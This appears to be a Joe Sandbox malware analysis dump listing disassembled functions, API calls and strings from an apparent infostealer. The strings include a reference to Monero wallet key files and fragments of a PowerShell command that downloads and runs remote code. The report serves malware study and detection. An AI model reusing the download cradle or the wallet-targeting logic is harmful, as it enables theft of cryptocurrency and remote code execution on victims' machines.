Function 00AC2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

ShellExecuteEx.SHELL32(0000003C), ref: 00AC2D85

Strings

')", xrefs: 00AC2CB3
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00AC2CC4
<, xrefs: 00AC2D39
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00AC2D04

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 721454029c19d1fff6e263131f30f73e1d23532eb20332f49d6a32f15bf00be6
Instruction ID: 0eacd7699988e61117095419b613f8d3ccace8292d0f6099e0fc53926b0f36f9
Opcode Fuzzy Hash: 721454029c19d1fff6e263131f30f73e1d23532eb20332f49d6a32f15bf00be6
Instruction Fuzzy Hash: 5F41B87191020C9BDB14EBA0D996FEDBB74AF20304F41451DE016AA192EF746A4ACF96

Function 6CB374A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6CB37526
__Init_thread_footer.LIBCMT ref: 6CB37566
__Init_thread_footer.LIBCMT ref: 6CB37597

Strings

kernel32.dll, xrefs: 6CB37557
UnmapViewOfFile2, xrefs: 6CB37552

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 565d340e6cd476fd02d423b28d93bea832594522e5b6fd34d1a221e5bfbed59b
Instruction ID: b47c3976392f64a9d7b7a573f562c2e7a339af7c4ed87ab437450319430f6411
Opcode Fuzzy Hash: 565d340e6cd476fd02d423b28d93bea832594522e5b6fd34d1a221e5bfbed59b
Instruction Fuzzy Hash: 7F2149357005D1EFCB188FE9C914E5E7775EB5A334F451528E40A67F80C770B811CAA6

Function 00AC6630 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00AC6663

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

ShellExecuteEx.SHELL32(0000003C), ref: 00AC6726
ExitProcess.KERNEL32 ref: 00AC6755

Strings

^, xrefs: 00AC66AA
<, xrefs: 00AC66D9

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: ^$<
API String ID: 1148417306-1894373548
Opcode ID: 041e41c86cfd3843053e8a52e6dfebc2bf4c0f368ed0cdcc27deae72e3ce8f3c
Instruction ID: 4bf0807f420225c7337ca30e82a56eda65103940100d2ba44fe6c035807054cc
Opcode Fuzzy Hash: 041e41c86cfd3843053e8a52e6dfebc2bf4c0f368ed0cdcc27deae72e3ce8f3c
Instruction Fuzzy Hash: B63127B1901218ABDB14EB90DE96FEEB778AF14304F404189F20A66191DF746B48CF6A

Function 6CB3C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CB3C0E9), ref: 6CB3C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CB3C437
FreeLibrary.KERNEL32(?,6CB3C0E9), ref: 6CB3C44C

Strings

NtQueryVirtualMemory, xrefs: 6CB3C431
ntdll.dll, xrefs: 6CB3C413

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 53cf3975d7b3d1c1c09eb69606e4ac82c1d61bd8b7c882caf86f7fa7348233ed
Instruction ID: f92bcb3dfa6b433161a4ad25e3caf8b37cd3b4e66ecbb4330a3a40257e916b53
Opcode Fuzzy Hash: 53cf3975d7b3d1c1c09eb69606e4ac82c1d61bd8b7c882caf86f7fa7348233ed
Instruction Fuzzy Hash: FDE0B674706351DBDF007F71D908B15BBF8F706216F88961AAA0993700EBF2D4158B51

Function 6CB375B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CB3748B,?), ref: 6CB375B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CB375D7
FreeLibrary.KERNEL32(?,6CB3748B,?), ref: 6CB375EC

Strings

RtlNtStatusToDosError, xrefs: 6CB375D1
ntdll.dll, xrefs: 6CB375B3

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 02f1dabfedba7997ed6801c6ff389065f5c8f0c99295c0e2c1394741bf4fa081
Instruction ID: 06db0216b073315f6971d18f441214ebce5c3e416960dbd13a10ec623c956318
Opcode Fuzzy Hash: 02f1dabfedba7997ed6801c6ff389065f5c8f0c99295c0e2c1394741bf4fa081
Instruction Fuzzy Hash: 29E0B675700341EFEF046FA2D948702BBF8EB16218FA45429AE05E3680EBB09452CF51

Function 00AB9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00AB9F41

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Strings

v20, xrefs: 00AB9E21
@, xrefs: 00AB9EF1
ERROR_RUN_EXTRACTOR, xrefs: 00AB9E67
v10, xrefs: 00AB9EA3

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 3055b3c373efa9861517ba47094f9c3bba40871149890a302b60735ebb416768
Instruction ID: c4eaad561af1af4c17eaddce806c621271a5785f8b649a2ee2194f34656897bd
Opcode Fuzzy Hash: 3055b3c373efa9861517ba47094f9c3bba40871149890a302b60735ebb416768
Instruction Fuzzy Hash: 2B615D70A0020CEBDB24EFA4CD96FED7779BF54344F408518F90A9B292EB746A05CB52

Function 6CAD4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CAD4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CAD4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAD4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CAD4F1E

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 91d5da6a1abd9be33b62e365c95959dd912ddc02a32128297ef9e55b4a1e363e
Instruction ID: 680b7aa84bb9f189e9aa3814b273650ec0d6f89064e523ce7287b4da746d6454
Opcode Fuzzy Hash: 91d5da6a1abd9be33b62e365c95959dd912ddc02a32128297ef9e55b4a1e363e
Instruction Fuzzy Hash: 7D41CF71608702AFC705CF29C48099BBBF4BF89344F158A2DF4A597651DB30F998CB92

Function 6CADB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6CADB532
moz_xmalloc.MOZGLUE(?), ref: 6CADB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CADB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CADB57E
free.MOZGLUE(00000000), ref: 6CADB58F

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 61aa1731f50d38a2fa627b36563a1e024cf28d07f11ca8a1cd10318b9fe02c4f
Instruction ID: 66f36dd2e2bf9df740024e0a2b75166dffa22a9bef652f3a69561272f0238200
Opcode Fuzzy Hash: 61aa1731f50d38a2fa627b36563a1e024cf28d07f11ca8a1cd10318b9fe02c4f
Instruction Fuzzy Hash: F0210771A00205DBDB008F69DC40BBEBBB9FF46304F294129E819DB341E775E955C7A0

Function 00AC6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00AC696C
sscanf.NTDLL ref: 00AC6999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AC69B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AC69C0
ExitProcess.KERNEL32 ref: 00AC69DA

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 09a3f6a0660ff1cc2d1dfe14e1a33c570e35e97ec701a110bb9479ba89e79f82
Instruction ID: 48edfc21f7e61c2ace50046e0e927290a106fbb58a76939738e60717248269d6
Opcode Fuzzy Hash: 09a3f6a0660ff1cc2d1dfe14e1a33c570e35e97ec701a110bb9479ba89e79f82
Instruction Fuzzy Hash: 7D219AB5D14209ABCF04EFE4D945BEEB7B5BF48300F04852EE51AA3250EB745605CBA6

Function 00AC9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(005EF330,?,?,?,00AC140C,?,005EF330,00000000), ref: 00AC926C
lstrcpyn.KERNEL32(00CFAB88,005EF330,005EF330,?,00AC140C,?,005EF330), ref: 00AC9290
lstrlen.KERNEL32(?,?,00AC140C,?,005EF330), ref: 00AC92A7
wsprintfA.USER32 ref: 00AC92C7

Strings

%s%s, xrefs: 00AC92B5

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 9328e2548a93f6d603cfea9a7395e713e88bb87d0ae7fcefc9bd646f07e0ff49
Instruction ID: 58493eb01f5ecad3351e834cec5321238ab27863cfd86d50afeb74f4120858ab
Opcode Fuzzy Hash: 9328e2548a93f6d603cfea9a7395e713e88bb87d0ae7fcefc9bd646f07e0ff49
Instruction Fuzzy Hash: 8D01A9B5500108FFCB04DFE8C988FAEBBB9EB48354F118548F90D9B244C671AA41DB96

Function 6CAFD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6CB0CBE8: GetCurrentProcess.KERNEL32(?,6CAD31A7), ref: 6CB0CBF1
Part of subcall function 6CB0CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CAD31A7), ref: 6CB0CBFA

EnterCriticalSection.KERNEL32(6CB5E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CB0D1C5), ref: 6CAFD4F2
LeaveCriticalSection.KERNEL32(6CB5E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CB0D1C5), ref: 6CAFD50B

